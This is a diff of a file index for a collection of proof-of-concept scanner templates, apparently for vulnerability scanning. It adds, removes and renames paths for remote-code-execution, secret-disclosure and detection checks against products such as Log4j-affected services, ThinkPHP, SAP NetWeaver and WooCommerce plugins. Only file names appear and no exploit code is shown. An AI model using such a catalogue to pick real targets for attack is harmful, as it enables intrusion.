./poc/remote_code_execution/metersphere-plugin-rce-8835.yaml ./poc/remote_code_execution/metersphere-plugin-rce-8836.yaml ./poc/remote_code_execution/metersphere-plugin-rce-8837.yaml +./poc/remote_code_execution/metersphere-plugin-rce.yaml ./poc/remote_code_execution/mgb-opensource-guestbook.yaml ./poc/remote_code_execution/microblogrce.yaml ./poc/remote_code_execution/min-and-max-purchase-for-woocommerce-29c59921f159dd1fd640d027a39c2496.yaml @@ -82676,7 +82695,7 @@ ./poc/remote_code_execution/minmax-quantity-for-woocommerce.yaml ./poc/remote_code_execution/mirai-unknown-rce-8897.yaml ./poc/remote_code_execution/mirai-unknown-rce-8898.yaml -./poc/remote_code_execution/mirai-unknown-rce-8899.yaml +./poc/remote_code_execution/mirai-unknown-rce.yaml ./poc/remote_code_execution/mobile-login-woocommerce-23d0bf81c74275c3e55e25a6c8aa8e5b.yaml ./poc/remote_code_execution/mobile-login-woocommerce-71c68dc9d2433d718771a35db7cc14f9.yaml ./poc/remote_code_execution/mobile-login-woocommerce-776ff600825d9dc7d0f61014766c27a4.yaml @@ -82730,10 +82749,10 @@ ./poc/remote_code_execution/n-media-woocommerce-checkout-fields-336a95f15580d76f749b87ee6265e68e.yaml ./poc/remote_code_execution/n-media-woocommerce-checkout-fields.yaml ./poc/remote_code_execution/nacos-jraftserver-deserialization-rce.yaml +./poc/remote_code_execution/natshell-rce-9009.yaml ./poc/remote_code_execution/natshell-rce-9010.yaml ./poc/remote_code_execution/natshell-rce-9011.yaml ./poc/remote_code_execution/natshell-rce-9012.yaml -./poc/remote_code_execution/natshell-rce.yaml ./poc/remote_code_execution/netentsec-ngfw-rce.yaml ./poc/remote_code_execution/netentsec-ngfw-rce.yml ./poc/remote_code_execution/netgear-wnap320-rce-9033.yaml @@ -82770,6 +82789,7 @@ ./poc/remote_code_execution/ns-woocommerce-watermark.yaml ./poc/remote_code_execution/nsfocus-sas-rce-exec.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9170.yaml +./poc/remote_code_execution/nuuo-nvrmini2-rce-9171.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9172.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9173.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9174.yaml @@ -82783,7 +82803,8 @@ ./poc/remote_code_execution/opentsdb-rce-1.yaml ./poc/remote_code_execution/opentsdb-rce-2.yaml ./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9341.yaml -./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9342.yaml +./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9343.yaml +./poc/remote_code_execution/optilink-ont1gew-gpon-rce.yaml ./poc/remote_code_execution/oracle-commerce-cloud.yaml ./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce-cb43a3033745f9235059b7d1b7a3d855.yaml @@ -82810,9 +82831,10 @@ ./poc/remote_code_execution/order-xml-file-export-import-for-woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/order-xml-file-export-import-for-woocommerce-plugin.yaml ./poc/remote_code_execution/order-xml-file-export-import-for-woocommerce.yaml +./poc/remote_code_execution/oscommerce-rce-9405.yaml ./poc/remote_code_execution/oscommerce-rce-9406.yaml -./poc/remote_code_execution/oscommerce-rce-9407.yaml ./poc/remote_code_execution/oscommerce-rce-9408.yaml +./poc/remote_code_execution/oscommerce-rce.yaml ./poc/remote_code_execution/oscommerce-workflow.yaml ./poc/remote_code_execution/oscommerce.yaml ./poc/remote_code_execution/out-of-stock-display-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml @@ -82863,6 +82885,7 @@ ./poc/remote_code_execution/pbootcms-v3.1.2-rce.yaml ./poc/remote_code_execution/pdf-invoices-and-packing-slips-for-woocommerce-9d530be5fa0db61096efe68f160be112.yaml ./poc/remote_code_execution/pdf-invoices-and-packing-slips-for-woocommerce.yaml +./poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml ./poc/remote_code_execution/pdf-signer-ssti-to-rce-9471.yaml ./poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml ./poc/remote_code_execution/pdf-signer-ssti-to-rce.yaml @@ -82884,6 +82907,7 @@ ./poc/remote_code_execution/phalcon-framework-source-9493.yaml ./poc/remote_code_execution/phalcon-framework-source-9494.yaml ./poc/remote_code_execution/phalcon-framework-source-9495.yaml +./poc/remote_code_execution/phalcon-framework-source-9496.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce-5f600e44d5a9bae2880bbdac987c18c0.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce-754324d17136d5a0b95bd48018ce3ad6.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce-a18b8eeee685e84b7ab5bc1637d15598.yaml @@ -82893,6 +82917,7 @@ ./poc/remote_code_execution/phone-orders-for-woocommerce-plugin.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce.yaml ./poc/remote_code_execution/php-8.1.0-dev-rce-sqli.yaml +./poc/remote_code_execution/php-zerodium-backdoor-rce-9569.yaml ./poc/remote_code_execution/php-zerodium-backdoor-rce-9570.yaml ./poc/remote_code_execution/php-zerodium-backdoor-rce-9571.yaml ./poc/remote_code_execution/php-zerodium-backdoor-rce-9572.yaml @@ -82913,8 +82938,8 @@ ./poc/remote_code_execution/portugal-ctt-tracking-woocommerce-61cc14cf15398c8841fd8b821c80cd0c.yaml ./poc/remote_code_execution/portugal-ctt-tracking-woocommerce.yaml ./poc/remote_code_execution/powercreator-cms-rce-9643.yaml +./poc/remote_code_execution/powercreator-cms-rce-9644.yaml ./poc/remote_code_execution/powercreator-cms-rce-9645.yaml -./poc/remote_code_execution/powercreator-cms-rce-9646.yaml ./poc/remote_code_execution/powercreator-cms-rce-9647.yaml ./poc/remote_code_execution/pre-orders-for-woocommerce-687db182b0c9655d84523f55416267f1.yaml ./poc/remote_code_execution/pre-orders-for-woocommerce.yaml @@ -83057,11 +83082,10 @@ ./poc/remote_code_execution/purple-xmls-google-product-feed-for-woocommerce.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9755.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9756.yaml -./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9757.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9758.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9759.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9760.yaml -./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9761.yaml +./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce.yaml ./poc/remote_code_execution/qianxin-secgate3600-syshandupfile-upload-rce.yaml ./poc/remote_code_execution/qilin-bastion-host-rce.yaml ./poc/remote_code_execution/qilin-bastion-host-rce.yml @@ -83076,10 +83100,9 @@ ./poc/remote_code_execution/quotes-for-woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/quotes-for-woocommerce-plugin.yaml ./poc/remote_code_execution/quotes-for-woocommerce.yaml +./poc/remote_code_execution/qvisdvr-deserialization-rce-9772.yaml ./poc/remote_code_execution/qvisdvr-deserialization-rce-9773.yaml -./poc/remote_code_execution/qvisdvr-deserialization-rce-9774.yaml ./poc/remote_code_execution/qvisdvr-deserialization-rce-9775.yaml -./poc/remote_code_execution/qvisdvr-deserialization-rce.yaml ./poc/remote_code_execution/racar-clear-cart-for-woocommerce-5bd5aa842bdc4d50b077cba9da1f3c12.yaml ./poc/remote_code_execution/racar-clear-cart-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/racar-clear-cart-for-woocommerce.yaml @@ -83089,6 +83112,7 @@ ./poc/remote_code_execution/random-sorting-order-for-woocommerce.yaml ./poc/remote_code_execution/rce-CVE-2021-21224.yaml ./poc/remote_code_execution/rce-bitrix-html-editor.yaml +./poc/remote_code_execution/rce-cve-2021-41773.yaml ./poc/remote_code_execution/rce-shellshock-user-agent-9831.yaml ./poc/remote_code_execution/rce-shellshock-user-agent-9832.yaml ./poc/remote_code_execution/rce-shellshock-user-agent-9833.yaml @@ -83096,7 +83120,6 @@ ./poc/remote_code_execution/rce-via-java-deserialization.yaml ./poc/remote_code_execution/rce-vuln-params.yaml ./poc/remote_code_execution/rce.yaml -./poc/remote_code_execution/rconfig-rce-9834.yaml ./poc/remote_code_execution/rconfig-rce-9835.yaml ./poc/remote_code_execution/rconfig-rce-9836.yaml ./poc/remote_code_execution/rconfig-rce.yaml @@ -83134,7 +83157,6 @@ ./poc/remote_code_execution/ruijie-eg-cli-rce.yaml ./poc/remote_code_execution/ruijie-eg-cli-rce.yml ./poc/remote_code_execution/ruijie-eg-rce-9925.yaml -./poc/remote_code_execution/ruijie-eg-rce-9926.yaml ./poc/remote_code_execution/ruijie-eg-rce-9927.yaml ./poc/remote_code_execution/ruijie-eg-rce-9928.yaml ./poc/remote_code_execution/ruijie-eg-rce-9929.yaml @@ -83143,7 +83165,6 @@ ./poc/remote_code_execution/ruijie-nbr-and-smartweb-level15-rce.yaml ./poc/remote_code_execution/ruijie-networks-rce-9943.yaml ./poc/remote_code_execution/ruijie-networks-rce-9944.yaml -./poc/remote_code_execution/ruijie-networks-rce-9945.yaml ./poc/remote_code_execution/ruijie-networks-rce-9946.yaml ./poc/remote_code_execution/ruijie-networks-rce-9947.yaml ./poc/remote_code_execution/ruijie-networks-rce-9948.yaml @@ -83163,6 +83184,7 @@ ./poc/remote_code_execution/salesforce-aura-9981.yaml ./poc/remote_code_execution/salesforce-aura-9982.yaml ./poc/remote_code_execution/salesforce-aura-9983.yaml +./poc/remote_code_execution/salesforce-aura-9984.yaml ./poc/remote_code_execution/salesforce-aura-detect.yml ./poc/remote_code_execution/salesforce-aura-misconfig.yaml ./poc/remote_code_execution/salesforce-credentials-detect.yml @@ -83176,8 +83198,8 @@ ./poc/remote_code_execution/samsung-wlan-ap-rce-10006.yaml ./poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml ./poc/remote_code_execution/samsung-wlan-ap-rce-10008.yaml -./poc/remote_code_execution/samsung-wlan-ap-rce-10009.yaml ./poc/remote_code_execution/samsung-wlan-ap-rce-10010.yaml +./poc/remote_code_execution/samsung-wlan-ap-rce.yaml ./poc/remote_code_execution/samsung-wlan-ap-wea453e-rce.yaml ./poc/remote_code_execution/samsung-wlan-ap-wea453e-rce.yml ./poc/remote_code_execution/sanfor-report-rce.yaml @@ -83186,6 +83208,7 @@ ./poc/remote_code_execution/sangfor-ad-login-rce.yaml ./poc/remote_code_execution/sangfor-ad-rce.yaml ./poc/remote_code_execution/sangfor-ba-rce(1).yaml +./poc/remote_code_execution/sangfor-ba-rce-10020.yaml ./poc/remote_code_execution/sangfor-ba-rce-10021.yaml ./poc/remote_code_execution/sangfor-ba-rce.yml ./poc/remote_code_execution/sangfor-cphp-rce.yaml @@ -83194,6 +83217,7 @@ ./poc/remote_code_execution/sangfor-edr-rce-10025.yaml ./poc/remote_code_execution/sangfor-edr-rce-10026.yaml ./poc/remote_code_execution/sangfor-edr-rce-10027.yaml +./poc/remote_code_execution/sangfor-edr-rce-10028.yaml ./poc/remote_code_execution/sangfor-edr-rce-10029.yaml ./poc/remote_code_execution/sangfor-edr-rce-10030.yaml ./poc/remote_code_execution/sangfor-edr-tool-rce.yaml @@ -83210,7 +83234,6 @@ ./poc/remote_code_execution/sar2html-rce-10080.yaml ./poc/remote_code_execution/sar2html-rce-10081.yaml ./poc/remote_code_execution/sar2html-rce-10082.yaml -./poc/remote_code_execution/sar2html-rce.yaml ./poc/remote_code_execution/satellian-cve-2020-7980-rce.yml ./poc/remote_code_execution/seacms-before-v992-rce.yaml ./poc/remote_code_execution/seacms-before-v992-rce.yml @@ -83253,6 +83276,7 @@ ./poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml ./poc/remote_code_execution/showdoc-file-upload-rce-10227.yaml ./poc/remote_code_execution/showdoc-file-upload-rce-10228.yaml +./poc/remote_code_execution/showdoc-file-upload-rce-10229.yaml ./poc/remote_code_execution/showdoc-file-upload-rce.yaml ./poc/remote_code_execution/side-cart-woocommerce-2b1e94ad1063793b918ab053345de198.yaml ./poc/remote_code_execution/side-cart-woocommerce-d22c68f75f7c5fd2804055b0b8953d92.yaml @@ -83260,7 +83284,7 @@ ./poc/remote_code_execution/side-cart-woocommerce.yaml ./poc/remote_code_execution/simple-e-commerce-shopping-cart-7e2981ed79fe5531ebd17112083654eb.yaml ./poc/remote_code_execution/simple-e-commerce-shopping-cart.yaml -./poc/remote_code_execution/simple-employee-rce-10280.yaml +./poc/remote_code_execution/simple-employee-rce-10279.yaml ./poc/remote_code_execution/simple-employee-rce.yaml ./poc/remote_code_execution/simple-woocommerce-csv-loader-ad18054d9efe7d6c6e0c45866e8bcf30.yaml ./poc/remote_code_execution/simple-woocommerce-csv-loader.yaml @@ -83304,18 +83328,16 @@ ./poc/remote_code_execution/splash-popup-for-woocommerce.yaml ./poc/remote_code_execution/spon-ip-intercom-ping-rce.yaml ./poc/remote_code_execution/spon-ip-intercom-ping-rce.yml +./poc/remote_code_execution/spon-ip-rce.yaml ./poc/remote_code_execution/sponip-network-system-ping-rce-10421.yaml ./poc/remote_code_execution/sponip-network-system-ping-rce-10422.yaml -./poc/remote_code_execution/sponip-network-system-ping-rce-10423.yaml -./poc/remote_code_execution/springboot-h2-db-rce-10454.yaml +./poc/remote_code_execution/springboot-h2-db-rce-10455.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10456.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10457.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10458.yaml -./poc/remote_code_execution/springboot-h2-db-rce.yaml ./poc/remote_code_execution/springboot-log4j-rce-10472.yaml ./poc/remote_code_execution/springboot-log4j-rce-10473.yaml ./poc/remote_code_execution/springboot-log4j-rce-10474.yaml -./poc/remote_code_execution/springboot-log4j-rce.yaml ./poc/remote_code_execution/springboot2.x_eureka_rce.yaml ./poc/remote_code_execution/springboot_eureka_rce.yaml ./poc/remote_code_execution/springcloud-function-spel-rce.yaml @@ -83382,6 +83404,7 @@ ./poc/remote_code_execution/swipehq-payment-gateway-woocommerce.yaml ./poc/remote_code_execution/swipehq-payment-gateway-wp-e-commerce-443842d1d8712ea7662492da3baca3c2.yaml ./poc/remote_code_execution/swipehq-payment-gateway-wp-e-commerce.yaml +./poc/remote_code_execution/symfonyrce.yaml ./poc/remote_code_execution/sync-ecommerce-neo-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/sync-ecommerce-neo-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/remote_code_execution/sync-ecommerce-neo.yaml @@ -83390,7 +83413,6 @@ ./poc/remote_code_execution/tamron-os-iptv-ping-rce.yaml ./poc/remote_code_execution/tamronos-iptv-rce.yaml ./poc/remote_code_execution/tamronos-iptv-rce.yml -./poc/remote_code_execution/tamronos-rce-10647.yaml ./poc/remote_code_execution/tamronos-rce-10648.yaml ./poc/remote_code_execution/tamronos-rce-10649.yaml ./poc/remote_code_execution/tamronos-rce-10650.yaml @@ -83399,19 +83421,18 @@ ./poc/remote_code_execution/terms-and-conditions-popup-for-woocommerce.yaml ./poc/remote_code_execution/terramaster-tos-rce-cve-2020-28188.yml ./poc/remote_code_execution/tg8rce.yaml -./poc/remote_code_execution/thinkcmf-rce-10725.yaml ./poc/remote_code_execution/thinkcmf-rce-10726.yaml ./poc/remote_code_execution/thinkcmf-rce-10727.yaml ./poc/remote_code_execution/thinkcmf-rce-10728.yaml ./poc/remote_code_execution/thinkcmf-rce-10729.yaml ./poc/remote_code_execution/thinkcmf-rce.yaml -./poc/remote_code_execution/thinkphp-2-rce-10738.yaml ./poc/remote_code_execution/thinkphp-2-rce-10739.yaml +./poc/remote_code_execution/thinkphp-2-rce-10740.yaml ./poc/remote_code_execution/thinkphp-2-rce-10741.yaml ./poc/remote_code_execution/thinkphp-30-rce.yaml ./poc/remote_code_execution/thinkphp-50-rce.yaml ./poc/remote_code_execution/thinkphp-501-rce-10742.yaml -./poc/remote_code_execution/thinkphp-501-rce.yaml +./poc/remote_code_execution/thinkphp-501-rce-10743.yaml ./poc/remote_code_execution/thinkphp-5010-rce.yaml ./poc/remote_code_execution/thinkphp-5022-5129-rce.yaml ./poc/remote_code_execution/thinkphp-5022-rce-10744.yaml @@ -83477,6 +83498,7 @@ ./poc/remote_code_execution/unifi-network-log4j-rce-10974.yaml ./poc/remote_code_execution/unifi-network-log4j-rce-10975.yaml ./poc/remote_code_execution/unifi-network-log4j-rce-10976.yaml +./poc/remote_code_execution/unifi-network-log4j-rce.yaml ./poc/remote_code_execution/uniview-isc-logreport-php-rce.yaml ./poc/remote_code_execution/users-customers-import-export-for-wp-woocommerce-0e7c6b52509d8bfd0e2b068d7ec9abcb.yaml ./poc/remote_code_execution/users-customers-import-export-for-wp-woocommerce-1bad351f445f2e54e7e634608cd598f9.yaml @@ -83489,22 +83511,20 @@ ./poc/remote_code_execution/vercel-detect.yaml ./poc/remote_code_execution/vercel-takeover-11001.yaml ./poc/remote_code_execution/vercel-takeover.yaml -./poc/remote_code_execution/visual-tools-dvr-rce-11030.yaml ./poc/remote_code_execution/visual-tools-dvr-rce-11031.yaml -./poc/remote_code_execution/visual-tools-dvr-rce-11032.yaml ./poc/remote_code_execution/visual-tools-dvr-rce.yaml -./poc/remote_code_execution/vmware-horizon-log4j-jndi-rce-11033.yaml ./poc/remote_code_execution/vmware-horizon-log4j-jndi-rce-11034.yaml +./poc/remote_code_execution/vmware-horizon-log4j-jndi-rce.yaml ./poc/remote_code_execution/vmware-horizon-log4j-rce.yaml ./poc/remote_code_execution/vmware-vcenter-cve-2021-21985-rce.yml ./poc/remote_code_execution/vmware-vcenter-log4j-jndi-rce-11050.yaml +./poc/remote_code_execution/vmware-vcenter-log4j-jndi-rce.yaml ./poc/remote_code_execution/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml ./poc/remote_code_execution/vmware-workspace-one-log4j-rce.yaml ./poc/remote_code_execution/voiprce.yaml ./poc/remote_code_execution/vrealize-operations-log4j-rce-11070.yaml ./poc/remote_code_execution/vrealize-operations-log4j-rce-11071.yaml ./poc/remote_code_execution/vrealize-operations-log4j-rce-11072.yaml -./poc/remote_code_execution/vrealize-operations-log4j-rce.yaml ./poc/remote_code_execution/waitlist-woocommerce-1e2ad2a10918e60801ce854af7dd4e85.yaml ./poc/remote_code_execution/waitlist-woocommerce-5ad2792bfde16c3909ed962131732d36.yaml ./poc/remote_code_execution/waitlist-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -83529,7 +83549,6 @@ ./poc/remote_code_execution/webappick-product-feed-for-woocommerce-ef466bbf7b36c7f4169533ec1161bc46.yaml ./poc/remote_code_execution/webappick-product-feed-for-woocommerce.yaml ./poc/remote_code_execution/webmin-cve-2019-15107-rce.yml -./poc/remote_code_execution/webui-rce-11170.yaml ./poc/remote_code_execution/webui-rce-11171.yaml ./poc/remote_code_execution/webui-rce-11172.yaml ./poc/remote_code_execution/webui-rce-11173.yaml @@ -84274,6 +84293,7 @@ ./poc/remote_code_execution/wordpress-ecommerce.yaml ./poc/remote_code_execution/wordpress-emails-verification-for-woocommerce-1.yaml ./poc/remote_code_execution/wordpress-emails-verification-for-woocommerce-11270.yaml +./poc/remote_code_execution/wordpress-emails-verification-for-woocommerce-11271.yaml ./poc/remote_code_execution/wordpress-emails-verification-for-woocommerce-2.yaml ./poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml ./poc/remote_code_execution/wordpress-ext-mailpress-rce.yaml @@ -84281,6 +84301,7 @@ ./poc/remote_code_execution/wordpress-rce-simplefilelist-11299.yaml ./poc/remote_code_execution/wordpress-rce-simplefilelist-11300.yaml ./poc/remote_code_execution/wordpress-rce-simplefilelist-11301.yaml +./poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml ./poc/remote_code_execution/wordpress-rce-simplefilelist-11303.yaml ./poc/remote_code_execution/wordpress-rce-simplefilelist-11304.yaml ./poc/remote_code_execution/wordpress-rce-simplefilelist.yaml @@ -84288,6 +84309,7 @@ ./poc/remote_code_execution/wordpress-woocommerce-listing-11338.yaml ./poc/remote_code_execution/wordpress-woocommerce-listing-11339.yaml ./poc/remote_code_execution/wordpress-woocommerce-listing-11340.yaml +./poc/remote_code_execution/wordpress-woocommerce-listing-11341.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-1.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-11342.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-11344.yaml @@ -84369,8 +84391,8 @@ ./poc/remote_code_execution/wp-woocommerce-email-verification-11618.yaml ./poc/remote_code_execution/wp-woocommerce-email-verification-11619.yaml ./poc/remote_code_execution/wp-woocommerce-email-verification-2.yaml -./poc/remote_code_execution/wp-woocommerce-file-download-11620.yaml ./poc/remote_code_execution/wp-woocommerce-file-download-11621.yaml +./poc/remote_code_execution/wp-woocommerce-file-download.yaml ./poc/remote_code_execution/wp-woocommerce-pdf-invoice-listing-11622.yaml ./poc/remote_code_execution/wp-woocommerce-quickbooks-24e0b26c242968cb290b2a8bf1d68029.yaml ./poc/remote_code_execution/wp-woocommerce-quickbooks-95df688c610b5a94c1c10c8d8b9ac0d6.yaml @@ -84387,9 +84409,11 @@ ./poc/remote_code_execution/xml-file-export-import-for-stampscom-and-woocommerce-0e7c6b52509d8bfd0e2b068d7ec9abcb.yaml ./poc/remote_code_execution/xml-file-export-import-for-stampscom-and-woocommerce.yaml ./poc/remote_code_execution/yapi-rce-11724.yaml +./poc/remote_code_execution/yapi-rce-11725.yaml ./poc/remote_code_execution/yapi-rce-11726.yaml ./poc/remote_code_execution/yapi-rce.yml ./poc/remote_code_execution/yarn-resourcemanager-rce-11734.yaml +./poc/remote_code_execution/yarn-resourcemanager-rce-11735.yaml ./poc/remote_code_execution/yarn-resourcemanager-rce-11736.yaml ./poc/remote_code_execution/yarn-resourcemanager-rce-11737.yaml ./poc/remote_code_execution/yccms-rce.yaml @@ -84398,6 +84422,7 @@ ./poc/remote_code_execution/yikes-inc-easy-custom-woocommerce-product-tabs-02a26657350b931c1f5ee83a424e363d.yaml ./poc/remote_code_execution/yikes-inc-easy-custom-woocommerce-product-tabs-294f45046fb020ee538eee2dd55090f7.yaml ./poc/remote_code_execution/yikes-inc-easy-custom-woocommerce-product-tabs.yaml +./poc/remote_code_execution/yisaitong-dataImport-rce.yaml ./poc/remote_code_execution/yisaitong-dataimport-rce.yaml ./poc/remote_code_execution/yisaitong-rce.yaml ./poc/remote_code_execution/yith-advanced-refund-system-for-woocommerce-959b1069d80fdc3a44260ad71185acf0.yaml @@ -84725,14 +84750,13 @@ ./poc/remote_code_execution/zzzcms-parser-search-rce.yaml ./poc/ruby/grails-database-admin-console-1.yaml ./poc/ruby/grails-database-admin-console-2.yaml +./poc/ruby/grails-database-admin-console-7819.yaml ./poc/ruby/grails-database-admin-console-7820.yaml -./poc/ruby/grails-database-admin-console-7821.yaml ./poc/ruby/grails-database-admin-console-7822.yaml ./poc/ruby/grails-database-admin-console.yaml ./poc/ruby/graphql-ruby-detect.yaml ./poc/ruby/rails-cve-2018-3760-rce.yml ./poc/ruby/rails-database-config-9801.yaml -./poc/ruby/rails-database-config-9802.yaml ./poc/ruby/rails-database-config-9803.yaml ./poc/ruby/rails-database-config-9804.yaml ./poc/ruby/rails-debug-mode-9805.yaml @@ -84740,15 +84764,15 @@ ./poc/ruby/rails-debug-mode.yaml ./poc/ruby/rails-routes-exposed.yaml ./poc/ruby/rails-secret-token-disclosure-9808.yaml -./poc/ruby/rails-secret-token-disclosure-9809.yaml +./poc/ruby/rails-secret-token-disclosure-9810.yaml ./poc/ruby/rails-secret-token-disclosure.yaml ./poc/ruby/rails-secret-token.yaml ./poc/ruby/rails6-xss-9797.yaml -./poc/ruby/rails6-xss-9798.yaml ./poc/ruby/rails6-xss-9799.yaml ./poc/ruby/rails6-xss-9800.yaml ./poc/ruby/ruby-help-desk-5db1ed033cd24d9fe5ecb1550e63481d.yaml ./poc/ruby/ruby-help-desk.yaml +./poc/ruby/ruby-on-rails-framework-exceptions-9920.yaml ./poc/ruby/ruby-on-rails-framework-exceptions-9921.yaml ./poc/ruby/ruby-on-rails-secret-token-disclosure.yaml ./poc/ruby/ruby-on-rails.yaml @@ -84757,7 +84781,6 @@ ./poc/ruby/rubygems-key.yaml ./poc/samba/samba-config-9985.yaml ./poc/samba/samba-config-9986.yaml -./poc/samba/samba-config.yaml ./poc/samba/samba-detect-9988.yaml ./poc/samba/samba-detect-9990.yaml ./poc/samba/samba-swat-panel-9992.yaml @@ -84807,19 +84830,18 @@ ./poc/sap/sap-netweaver-detect-10043.yaml ./poc/sap/sap-netweaver-detect-10044.yaml ./poc/sap/sap-netweaver-detect-10046.yaml -./poc/sap/sap-netweaver-detect-10047.yaml ./poc/sap/sap-netweaver-detect-10048.yaml ./poc/sap/sap-netweaver-detect.yaml ./poc/sap/sap-netweaver-info-leak-10049.yaml ./poc/sap/sap-netweaver-info-leak-10050.yaml ./poc/sap/sap-netweaver-info-leak-10051.yaml +./poc/sap/sap-netweaver-info-leak.yaml ./poc/sap/sap-netweaver-portal-10054.yaml ./poc/sap/sap-netweaver-portal-10055.yaml ./poc/sap/sap-netweaver-portal.yaml ./poc/sap/sap-netweaver-rce.yaml ./poc/sap/sap-netweaver-webgui-10056.yaml ./poc/sap/sap-netweaver-webgui-10057.yaml -./poc/sap/sap-netweaver-webgui-10058.yaml ./poc/sap/sap-netweaver-webgui-10059.yaml ./poc/sap/sap-netweaver-workflow-10060.yaml ./poc/sap/sap-netweaver-workflow-10061.yaml @@ -84828,9 +84850,8 @@ ./poc/sap/sap-nw-abap-info-leakyaml.yaml ./poc/sap/sap-nw-abap-webgui.yaml ./poc/sap/sap-nw-abap.yaml -./poc/sap/sap-recon-detect-10063.yaml +./poc/sap/sap-recon-detect-10062.yaml ./poc/sap/sap-recon-detect.yaml -./poc/sap/sap-redirect-10064.yaml ./poc/sap/sap-redirect-10065.yaml ./poc/sap/sap-redirect-10066.yaml ./poc/sap/sap-redirect-10067.yaml @@ -84844,7 +84865,9 @@ ./poc/sap/sap-web-dispatcher-10075.yaml ./poc/sap/sap-web-dispatcher-10076.yaml ./poc/sap/sap-web-dispatcher-10077.yaml +./poc/sap/sap-web-dispatcher-10078.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10069.yaml +./poc/sap/sap-web-dispatcher-admin-portal-10070.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10071.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10072.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10073.yaml @@ -84965,7 +84988,7 @@ ./poc/search/ajax-search-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/search/ajax-search-pro-plugin.yaml ./poc/search/ajax-search-pro.yaml -./poc/search/aws-opensearch-login-650.yaml +./poc/search/aws-opensearch-login-649.yaml ./poc/search/aws-opensearch-login.yaml ./poc/search/axublog_v1-search-sqli.yaml ./poc/search/better-search-162a0d80b5d220d9e37c3f6ae9fddb60.yaml @@ -85055,7 +85078,6 @@ ./poc/search/elasticsearch-1.yaml ./poc/search/elasticsearch-2.yaml ./poc/search/elasticsearch-5-version.yaml -./poc/search/elasticsearch-7193.yaml ./poc/search/elasticsearch-7194.yaml ./poc/search/elasticsearch-7195.yaml ./poc/search/elasticsearch-7196.yaml @@ -85071,8 +85093,10 @@ ./poc/search/elasticsearch-insecure-default-config.yaml ./poc/search/elasticsearch-log4j.yaml ./poc/search/elasticsearch-sql-client-detect-7189.yaml +./poc/search/elasticsearch-sql-client-detect-7190.yaml ./poc/search/elasticsearch-sql-client-detect-7191.yaml ./poc/search/elasticsearch-sql-client-detect-7192.yaml +./poc/search/elasticsearch-sql-client-detect.yaml ./poc/search/elasticsearch-unauth.yaml ./poc/search/elasticsearch-unauth.yml ./poc/search/elasticsearch-unauthorized-access.yaml @@ -85200,6 +85224,7 @@ ./poc/search/search-unleashed-43b47c7d41209b50fd68346a0295170e.yaml ./poc/search/search-unleashed.yaml ./poc/search/searchbar.yaml +./poc/search/searches.yaml ./poc/search/searchiq-486b2d79f520ba9226667882d1e0c61d.yaml ./poc/search/searchiq-5009d6ede19c15ff2d2f30c18e0f60b2.yaml ./poc/search/searchiq-5f115235a8b59c98637592fa393641f7.yaml @@ -85366,7 +85391,7 @@ ./poc/sensitive/sensitive-storage-data-exposure-5.yaml ./poc/sensitive/sensitive-storage-data-exposure-6.yaml ./poc/sensitive/sensitive-storage-exposure-1.yaml -./poc/sensitive/sensitive-storage-exposure-10143.yaml +./poc/sensitive/sensitive-storage-exposure-10144.yaml ./poc/sensitive/sensitive-storage-exposure-2.yaml ./poc/sensitive/sensitive-storage-exposure-3.yaml ./poc/sensitive/sensitive-storage-exposure-4.yaml @@ -85401,15 +85426,17 @@ ./poc/shopify/import-shopify-to-woocommerce.yaml ./poc/shopify/seoking-shopify-app.yaml ./poc/shopify/shopify-app-installer.yaml -./poc/shopify/shopify-custom-token-10198.yaml +./poc/shopify/shopify-custom-token(1).yaml +./poc/shopify/shopify-custom-token-11860.yaml ./poc/shopify/shopify-custom-token.yaml ./poc/shopify/shopify-legacy-private-app-token.yaml -./poc/shopify/shopify-private-token-10199.yaml ./poc/shopify/shopify-private-token-11861.yaml ./poc/shopify/shopify-private-token.yaml ./poc/shopify/shopify-public-access.yaml 